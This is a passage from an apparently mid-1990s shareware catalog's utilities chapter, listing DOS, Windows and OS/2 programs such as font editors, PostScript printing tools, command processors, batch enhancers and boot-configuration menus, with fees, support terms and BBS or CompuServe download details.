Hercules or EGA + monitor. Mouse. + Registration fee: $80.00 + Registration benefits: Printed manual and disk; phone/BBS/ + newsletter support. + Look for: QFONT*.* on BBSs (call 608-271-3685 to download it at + no charge); QFONT.* on CompuServe in CIS:PCUTIL forum LIBrary 7 + (or contact userID 74275,745 for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Graphic "paint" program to edit and create HP Laserjet + downloadable soft fonts. Has complete editing functions - cut + and paste, circle, curves, arcs, lines, rectangles, fills and + so on - plus powerful transformation functions such as shadow, + outline, bolden, lighten, slant and resize. Modify font + headers. Test spacing. Download fonts with sample printouts. + Change mono spaced fonts to proportional and vice versa. Use + fonts in DTP programs like Ventura, or wordprocessors such as + WordPerfect. + + Chapter 2, "Utilities" 93 + + + + 2.4.5.4 PostScript + + Product: LPRINT + Author: + Version: 2.1 (02-22-94) + Needs: IBM PC, DOS 3.0 or better. 100k RAM; Postscript printer. + Registration fee: $30.00 + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 6 months of fax, CompuServe, mail support; bonus + utilities; bonus templates. 6-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: availability unknown on BBSs; LPRINT.ZIP on CompuServe + in CIS:SHAREW forum LIBrary 0. + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Takes advantage of the advanced graphic capabilities of + PostScript when printing listings or other ASCII text files. + * Process text to print on printer + * Select any font or print size + * Select portrait or landscape orientation + * Handles embedded formfeeds + * Encloses text in a border with a title block (TB) + * Prints company name, logo, pathname in TB + * Gets TB data from document + * Gets username from DOS SET + * Page numbering + * Counts words, lines, pages + + + Product: Over_LAZ PS + Author: , 519-366-2732 + Version: 3 (01-15-93) + Needs: IBM PC, DOS 2.0 or better. Postscript printer. + WordPerfect 5.x, WordStar, PC-Write, dBase. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of support; bonus templates. + Look for: availability unknown on BBSs; OVERPS.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72060,1153 for + assistance); OVERPS.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID MIKLOS.G for assistance). + Download size: 117k (about nine minutes with a 2400 baud modem) + Description: + A collection of over 75 printer overlay files for WordPerfect + 5.0 or later, WordStar, PC-Write, dBase and other applications + and a PostScript compatible printer. Over_LAZ are provided for + standard office forms (inter office memo, FAX transmittal, etc) + as well as rubber stamps (draft, confidential, etc) and + decorative page borders. Over_LAZ PS are automatically printed + on the page over your document. + + Chapter 2, "Utilities" 94 + + + + Product: PS-SLEEVE + Author: , 704-525-1472 + Version: 2.0 (03-01-92) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk; Postscript printer. + Registration fee: $14.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support. + Look for: SLEEVE.ZIP on BBSs; SLEEVE.ZIP on CompuServe in CIS:DTP + forum LIBrary 6 (or contact userID 75160,2530 for assistance); + SLEEVE.ZIP on GEnie in PSRT forum LIBrary 1. + Download size: 26k (about two minutes with a 2400 baud modem) + Description: + Print 51/4" or 31/2" floppy disk storage sleeves on your PostScript + printer. Just insert a floppy disk in Drive A or B and print a + sleeve template on your printer containing up to 192 file names + in all subdirectories on the floppy. Cut it apart, tape or + glue the flaps, and you're done. Don't get writer's cramp + writing all those tiny file names. + + + 2.5 System utilities + + 2.5.1 Operating systems + + See also: Utilities, Software tools & add-ins, For operating + systems. + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 494. + + Product: Free System Resources + Notification of low memory resources. See full description on + page 61. + + Product: System Monitor + Author: , 805-541-0910 + Version: 3.0 (10-24-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $49.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: SYSMON30.ZIP on BBSs (multiple files) (call + 805-258-6172 to download it at no charge). + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + Monitors and reports problems early, maintains performance, + resolves hardware/software and MS-Windows conflicts. Strong + virus defense, with support for single and LAN users. Each time + + Chapter 2, "Utilities" 95 + + + + the computer s used, it re-evaluates the system by testing and + extensively monitoring a number of performance and security + indicators. Computer consultants and service organizations can + include an optional message to advertise and promote their + support services. + + + Product: ToolBOX + A simple yet uniquely powerful DOS shell. See full description + on page 19. + + Product: TOP + Ultimate DOS command enhancement utility. See full description + on page 99. + + 2.5.1.1 Task-switching + + Product: LegRoom + Author: , 610-328-1145 + Version: 3.0 (02-06-95) + Needs: IBM PC, DOS 2.0 or better. 1k RAM; CGA monitor; Hercules + monitor; Dual 720k floppy drives. + Strongly recommended: Hard disk; EMS memory; XMS memory. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month return policy; all ASP-wide offers (see + page 5). 1 free update disk(s) sent out. + Look for: LGROOM30.ZIP on BBSs (call 215-322-5114 to download it + at no charge); LGROOM.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 3 (or contact userID 71221,3602 for assistance). + SWREG#: 2833 + PsL#: 11409 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A TSR which lets you press a 'hot key' to shell to DOS from + virtually any application (text or graphic) and reclaim almost + all of your conventional memory for running big programs. Works + with programs that don't have a built-in DOS shell feature. + Lets you turn any program, even a batch file, into a TSR - + without any programming! Can use extended and expanded memory. + Supports concurrent users on a LAN. Create pop-up command + menus. + + + 2.5.2 Multi-OS utilities + + See also: Utilities, Software tools & add-ins, For operating + systems. + + Chapter 2, "Utilities" 96 + + + + Product: 4FILES + File manager, annotator and program launcher. See full + description on page 27. + + Product: ABcmd + Author: + Version: 1.0 (03-15-94) + Needs: IBM 80386, Windows 3.1 or better. 35k RAM. + Registration fee: $15.00 (add $1.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, mail + support; discounts on upgrades; registration commissions. + Look for: availability unknown on BBSs; ABCMD.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 4 (or contact userID 72345,1623 for + assistance). + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + A real handy Windows command line with up front, intuitive, + easy-to-use controls. Features history, common dos commands, + multiple commands per line, 10 memory buttons for command line + storage, alarm function for time/date reminders or program + execution. Compact, all-in-one, 35k size doesn't clutter up + disk. + + + Product: Bootit + Author: + Version: 1.02 (09-03-95) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; Hard + disk. + Registration fee: $17.95 (add $9.95 for shipping to Canadian + addresses) (add $9.95 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; bonus + utilities; discounts on upgrades. 2-month free upgrading + allowed. + Look for: availability unknown on BBSs; BOOTIT.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 3 (or contact userID 70751,3507 for + assistance). + SWREG#: 5923 + Download size: 107k (about eight minutes with a 2400 baud modem) + Description: + Lets you have up to ten "master" partitions per hard drive, + instead of the standard four. This allows you to install + multiple operating systems in their own file systems and easily + select which one you want to boot. Also allows you to "fill" + the standard partition table (the one that only allows four + partitions) with up to three of your choice; for example, you + could boot Windows NT and have two DOS partitions. You can also + enter hard drive specifications to override the BIOS and/or + swap drives. + + Chapter 2, "Utilities" 97 + + + + Product: COMpanion + DOS personal network for up to 5 PCs. See full description on + page 376. + + Product: JRchive + Royalty-free file compression/archiving util. See full + description on page 41. + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 160. + + Product: Technical Editor (Windows NT) + Programmers/text editor. See full description on page 189. + + 2.5.3 Command processors + + Product: 4DOS + Author: , 617-646-3975 + Version: 5.0 (11-23-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Strongly recommended: Hard disk. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, BBS, CompuServe, newsletter, mail + support; 3-month return policy; all ASP-wide offers (see + page 5); disks of other shareware; discounts on other products; + discounts on upgrades. + Look for: 4DOS*.ZIP on BBSs (multiple files) (call 617-354-7077 + to download it at no charge); 4DOS*.ZIP on CompuServe in + CIS:PCVENB forum LIBrary 10 (multiple files) (or contact userID + 75020,244 for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Awards & nominations: 1989 finalist, PC Magazine Technical + Excellence Awards. 1994 winner, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1992 winner, Shareware Industry + Awards. 1989 winner, Public Brand Software contests for useful + programs. + Description: + The first utility to combine the power of the command line with + the pleasure of an easy to use interface. Enhances the + commands you're used to working with and then adds over 50 new + commands. It offers the power and flexibility you need, so + that you'll actually prefer the command line for certain tasks. + Because it only replaces COMMAND.COM, the rest of your software + works just as it always has. Try it and find out why users + love this refreshing, innovative command processor! + + Chapter 2, "Utilities" 98 + + + + Product: 4DOS for Windows NT + Author: , 617-646-3975 + Version: 2.0 (01-24-94) + Needs: IBM 80386, Windows NT 3.1 or better. + Registration fee: $79.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + fax, BBS, CompuServe, newsletter, mail support; 3-month return + policy; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: 4NTX.ZIP on BBSs (multiple files) (call 617-354-7077 to + download it at no charge); 4NT*.ZIP on CompuServe in CIS:PCVENB + forum LIBrary 10 (multiple files) (or contact userID 75020,244 + for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Description: + The first utility to combine the power of the command line with + the pleasure of an easy to use interface. It is a refreshing + replacement for the Windows NT command shell, CMD.EXE. Enhances + most Windows NT commands, and adds over 50 of its own. It + supports all disk formats, including FAT, HPFS, and NTFS. It's + fully compatible with traditional commands, so there isn't a + new language to learn. If you've ever been frustrated by the + limitations of the command line, try this. + + + Product: 4OS2 + Author: , 617-646-3975 + Version: 2.0 (12-16-93) + Needs: IBM AT (80286), OS/2 1.0 or better. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, BBS, CompuServe, newsletter, mail + support; 3-month return policy; disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: 4OS2X.ZIP on BBSs (multiple files) (call 617-354-7077 + to download it at no charge); 4OS2*.ZIP on CompuServe in + CIS:PCVENB forum LIBrary 10 (multiple files) (or contact userID + 75020,244 for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Description: + The first utility to combine the power of the command line with + the pleasure of an easy to use interface. An innovative + replacement for the OS/2 command shell CMD.EXE, it enhances + most commands and adds over 50 of its own. Commands offer you + the power and flexibility you need so you'll actually prefer + the command line for certain tasks. It supports all disk + formats, including FAT and HPFS. If you've ever been left + + Chapter 2, "Utilities" 99 + + + + frustrated by the limitations of the command line, then try + this. + + + Product: ABmenu + Fast/easy, program menu and directory changer. See full + description on page 162. + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 155. + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 160. + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 179. + + Product: Task Scheduler for DOS + Author: , 314-781-8709 + Version: 2.5 (08-01-93) + Needs: IBM PC, DOS 3.0 or better. 3k RAM. + Registration fee: $35.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; discounts on upgrades. + Look for: SCHEDTSK.ZIP on BBSs (call 314-638-3041 to download it + at no charge); SCHEDT.ZIP on CompuServe in CIS:DOS SHAREW forum + LIBrary 9 (or contact userID 73613,3606 for assistance). + SWREG#: 1855 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + A Task and Event manager which will schedule and run any + programs. This means you can run unattended backups or other + processes any time of the day or night just by setting the date + and time, and listing the programs to be run. Programs can be + run once, daily, weekly, monthly, or at an interval you set! + The TSR only requires 2.5K when resident. + + + Product: TOP + Author: , 716-872-1377 + Version: 2.0 (11-15-93) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Strongly recommended: Mouse. + Registration fee: $50.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 36 months of phone, fax, BBS, CompuServe, mail + support; 12-month return policy; bonus utilities; all ASP-wide + + Chapter 2, "Utilities" 100 + + + + offers (see page 5). 1-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: TOP200.ZIP on BBSs (call 716-872-4913 to download it at + no charge); TOP200.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 70403,2351 for assistance). + Download size: 351k (about 26 minutes with a 2400 baud modem) + Description: + Improves DOS commands without sacrificing the command line! + Adds command history, file management, program scheduling, + aliasing, menus, mouse, 4000+ lines of on-line help, much more! + Most commands can be accessed through pop-up windows with mouse + "drag and drop" between windows, screen and command line. Pop- + up windows can be displayed while you type, including help! + Screen savers, custom colors, super VGA modes, can use EMS or + XMS. The color DIR utility alone has over 35 options. + + + Product: WinKillr + Author: , 719-531-0403 + Version: 1.0 (05-28-95) + Needs: IBM 80386, Windows 3.1 or better. 512k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of + CompuServe, mail support; lifetime return policy; bonus + utilities; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. + Look for: KILLR_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); KILLR.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 179k (about 14 minutes with a 2400 baud modem) + Description: + New!! Timed Program Terminator - Designed to "terminate" + programs at a specific time, time/date or after a specified + elapsed time. Will Save open files and "Save As" open files + that have not yet been named. Don't let that e-mail client you + forgot to "kill" at work lock you out again! + + Chapter 2, "Utilities" 101 + + + + 2.5.4 Batch & macro utilities + + Product: ACTION Process Automator + Author: , 310-832-6984 + Version: 1.05 (08-25-95) + Needs: IBM 80386, Windows 3.1 or better. 8000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Strongly recommended: SVGA monitor; Network (LAN); XMS memory; + math coprocessor. + Registration fee: $79.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; ACT_105.ZI on CompuServe + in CIS:WINSHARE forum LIBrary 8 (or contact userID 71744,3633 + for assistance). + SWREG#: 5177 + PsL#: 14004 + Download size: 1690k (about 126 minutes with a 2400 baud modem) + Description: + Appears iconized when Windows is loaded and takes charge over + predetermined tasks, triggering them whenever they are + scheduled to occur. Just click the icon to add, delete, edit, + view or test actions. It can copy, rename, move files and + directories, start applications,play macros, zip and unzip + archives, attach servers, map drives, reboot, restart. + + + Product: A Batch View + Author: , 817-263-4056 + Version: 1.1 (09-30-93) + Needs: IBM PC, DOS 3.0 or better. 32k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 5). 24-month free + upgrading allowed. 24 free update disk(s) sent out. + Look for: ABATVIEW.ZIP on BBSs; ABTVEW.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 72614,602 for + assistance). + Download size: 138k (about ten minutes with a 2400 baud modem) + Description: + Eight programs make up a utility set designed to enhance your + batch Files. Operates in color or monochrome text modes. A pop- + up menu program with selectable colors, shadowing, text or + ASCII code wallpapered backgrounds, 48 selections. A pop-up + message program (same options) with system info. DOS echo + + Chapter 2, "Utilities" 102 + + + + replacement for color text and graphic symbols. Scrolling + messages/billboard marquee program. (multi-option) color screen + clearing, information, system utility programs. Text file + viewer + + + Product: BATUTIL + Author: + Version: 4.0 (12-23-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $43.00 + Registration benefits: Printed manual, CompuServe support. + Look for: availability unknown on BBSs; SKEY??.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 3 (or contact userID 76004,1664 for + assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Lets you spiff up your batch files with accesss to hardware + information, display of text in color and/or large letters, pop + up menus and file lists. You can directly access the + environment and have paths up to 255 characters long. PC + Magazine called it the 'ultimate batch enhancer' and PC World + and PC Computing included it in "Best of.." articles. Has a + full fledged language with if..then, case, etc. + + + Product: ENVI_MAN + Author: , 813-377-2515 + Version: 1.10 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. + Look for: EMAN110.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 34k (about three minutes with a 2400 baud modem) + Description: + An environment utility that accomplishes two major function. + First - display all current environment strings and data about + the environment such as the location, size and space + availability of the Master environment. Second - let a batch + file know how much environment space is currently available and + to provide a graceful exit if there isn't enough. It may also + show under certain circumstances the size of the master + environment can be expanded without changes being made to + CONFIG.SYS. + + Chapter 2, "Utilities" 103 + + + + Product: EXTENDED BATCH LANGUAGE-PLUS! + Author: , 407-738-1712 + Version: 4.08 (04-12-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $79.00 (add $3.00 for shipping to U.S. + addresses) (add $12.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 51/4" + master disk(s); 6 months of phone, BBS, newsletter support; + 1-month return policy; bonus utilities. + Look for: EBL.ZIP on BBSs (call 407-738-1843 to download it at no + charge); EBL*.ZIP on CompuServe in CIS:PCUTIL forum LIBrary 1 + (or contact userID 71426,204 for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Makes your batch files hum! Adds professional extensions to + existing MS-DOS batch files to: + v/ Integrate and automate programs to work together + v/ Speed batch files up to 5 times faster + v/ Add structured IF, REPEAT, WHILE, BEGIN/END commands + v/ Create menus automatically + v/ Design professional user interfaces (windows, several menu + types, sound, and more) + v/ Add over 100 commands, functions, and expression types + Using batch files will never be the same. + + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 30. + + Product: FileMod + Author: , 314-861-1500 + Version: 1.2 (06-17-95) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $10.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: FILEMD12.ZIP on BBSs (call 317-784-2147 to download it + at no charge); FILEMD.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 0 (or contact userID 70700,630 for assistance). + Download size: 15k (about one minute with a 2400 baud modem) + Description: + Can make modifications to your systems files from within a + batch file or at the command line. Updates FILES, BUFFERS, + PATH, add/remove lines, modify parameters, remark out lines and + more.... + + Chapter 2, "Utilities" 104 + + + + Product: HandyDOS + File/disk, prof batching, video & menu utils. See full + description on page 115. + + Product: MENU_MAN + Author: , 813-377-2515 + Version: 2.00 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 5); disks of other + shareware. + Look for: MMAN200.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Allows the display of user selection menus from within batch + files. These menus are controlled by command line options and + can contain a title and up to nineteen selection option lines + that are generated from REM lines in the batch file which + follows the call to MENU-MAN. Options include either selection + or check-box menus, a user response time limit, menu + positioning, erasing the screen before/after menu display, and + menu sound, color and type customization. + + + Product: MicroFox DOS Utilities + DOS Utilities for Printers, screens, files. See full + description on page 31. + + Product: PALERT + Author: , 909-352-2820 + Version: 2.4 (10-22-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PALERT24.ZIP on BBSs (call 714-352-2825 to download it + at no charge). + Download size: 27k (about two minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + A batch file utility designed to check your disk freespace + before starting an application. Specify how much disk + freespace you need for a program and it insures you have it + before starting an application. Don't be caught in your + wordprocessor or spreadsheet with a file that is too big to be + saved. Put it in your AUTOEXEC.BAT file to warn you when your + + Chapter 2, "Utilities" 105 + + + + hard disk is getting full. Presents a graphical representation + of space to let you quickly determine freespace levels. + + + Product: PATH_MAN + Author: , 813-377-2515 + Version: 1.15 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. + Look for: PMAN115.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 35k (about three minutes with a 2400 baud modem) + Description: + A utility that searches the directory path elements of the PATH + statement for a given file. The search file name may include + DOS wildcard characters. The ERRORLEVEL variable is set, based + on the results of this search, to allow more user friendly + batch files - a graceful exit can be made when needed data + files or programs are missing. Optionally, the path element on + which the search file is located may be displayed. + + + Product: PDAILY + Author: , 909-352-2820 + Version: 1.0 (10-10-86) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $14.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PDAILY.ZIP on BBSs (call 909-352-2825 to download it at + no charge); PDAILY.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 76347,2477 for assistance). + Download size: 11k (about one minute with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Lets users execute one or more DOS batch commands once per day. + Use it when you execute a batch command multiple times per day + but want selected commands to execute only once. For instance + backup or disk cleanup. Can be implemented in your + AUTOEXEC.BAT file. + + + Product: QIC-BAT for CMS + Enhancement software for Colorado tape drives. See full + description on page 35. + + Chapter 2, "Utilities" 106 + + + + Product: STACKEY + Keystroke stacking utility. See full description on page 63. + + Product: Task Scheduler for DOS + Schedule task/programs to run anytime. See full description on + page 99. + + 2.5.4.1 Batch file compilers + + See also: Computer programming, Languages. + + Product: PowerBatch + Author: , 404-926-9565 + Version: 2.2 (05-15-94) + Needs: IBM PC, DOS 2.1 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $30.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of fax, CompuServe, mail support; 3-month return policy; + all ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. + Look for: PWRBAT20.ZIP on BBSs; PWRBAT.EXE on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 72701,155 for + assistance). + SWREG#: 2335 + PsL#: 11265 + Download size: 255k (about 19 minutes with a 2400 baud modem) + Description: + Provides a replacement language for DOS batch files. If you can + write a DOS batch file you can create your own .EXE + replacement. More flexibility than batch files. Creates stand- + alone .EXE program, no enhancer file to drag along. Total color + control, fast screen writes, inputs from the keyboard, true + defined variables, program flow control, access to system info + (environ variables, disk types, file sizes, etc). Execute any + external non-TSR .EXE, .COM, .BAT or DOS command. Over 80 cmds. + + + 2.5.5 Configuration utilities + + See also: Computer programming, Languages. + + Chapter 2, "Utilities" 107 + + + + Product: BOOT.SYS + Author: + Version: 2.10 (10-26-94) + Needs: IBM PC, DOS 2.11 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + 3-month limited return policy. Lifetime free upgrading + allowed. Free CompuServe IntroPak. + Look for: BOOT210.ZIP on BBSs (call 909-681-6221 to download it + at no charge); BOOTSY.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73237,3556 for assistance); + BOOT210.ZIP on GEnie in IBMPC forum LIBrary 15. + PsL#: 10020 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Gives you one or more menus out of CONFIG.SYS to select your + configuration while you're booting up. Similar to DOS6 multi- + config - adds a pretty menu; if/then/else, use of variables, + and on-the-fly editing in CONFIG.SYS; reboot from cmd line; + passwords; installation program, automatically upgrades DOS6 + multi-config; more! Does not write to your disk! No resident + driver under DOS6! Up to 20 items per menu, 25 menus. MS/PC-DOS + 2.11 to 6.3, DR DOS 5.0/6.0, Novell DOS 7, supports DOS= cmd, + QEMM7. + + + Product: Bootit + Multi-boot/user defined HD specs. See full description on + page 96. + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 165. + + Chapter 2, "Utilities" 108 + + + + Product: DasBOOT! + Author: + Version: 3.0 (10-01-94) + Needs: IBM PC, DOS 2.11 or better. EGA monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of mail support. + Look for: availability unknown on BBSs; DASBOT.ZIP on CompuServe + in CIS:FSFORUM forum LIBrary 13 (or contact userID 76662,1623 + for assistance). + Download size: 54k (about four minutes with a 2400 baud modem) + Description: + This menu program lets the user select between several sets of + CONFIG.SYS and AUTOEXEC.BAT files. A very handy utility + program to help you get the maximum amount of memory for using + flight simulators or other memory hungry programs and then + allows an easy way to restore your normal day-to-day + configuration. Compatible with Stacker and delayed-write disk + caches. No double boot needed with Stacker, and flushes write- + delayed caches. Up to 200 configs. + + + Product: EZSET + A versatile printer setup utility. See full description on + page 81. + + Product: HiMOVE + Upper memory manager. See full description on page 61. + + Product: Program Group Specialist + Makes adding icons to Pgm Mgr simple. See full description on + page 166. + + Product: SHERLOCK + A dual window ASCII file comparison utility. See full + description on page 49. + + Chapter 2, "Utilities" 109 + + + + Product: Snooper + Author: , 415-921-6262 + Version: 3.40 (06-21-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $39.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; lifetime return policy; discounts on upgrades. + Lifetime free upgrading allowed. + Look for: SNOOP340.ZIP on BBSs (call 904-335-7289 to download it + at no charge); SNOOPR.ZIP on CompuServe in CIS:PCHW forum + LIBrary 4 (or contact userID 72260,1601 for assistance). + SWREG#: 2535 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A powerful yet friendly system info utility. It shows CPU/NDP, + bus (incl. PCI), CPU speed, DOS, BIOS, memory, disks, video, + CD-ROM, env, keyboard, sound cards, ports, IDE model, CMOS + info, disk cache, Stacker, FILES= & BUFFERS=, IRQs, DMA, + modems, fax/modems, mice, port IRQs. Lets you edit CMOS, + CONFIG, & AUTOEXEC. Network info and benchmark screens, detects + 1100 MicroChannel cards. Auto-logging feature. Ideal for tech + support, HW inventory, & you! + + + Product: Super Stuff Utilities + Windows based utilities that enhance Windows. See full + description on page 166. + + Product: SuperSet - Environment Extender + Author: + Version: 1.1 (02-01-95) + Needs: 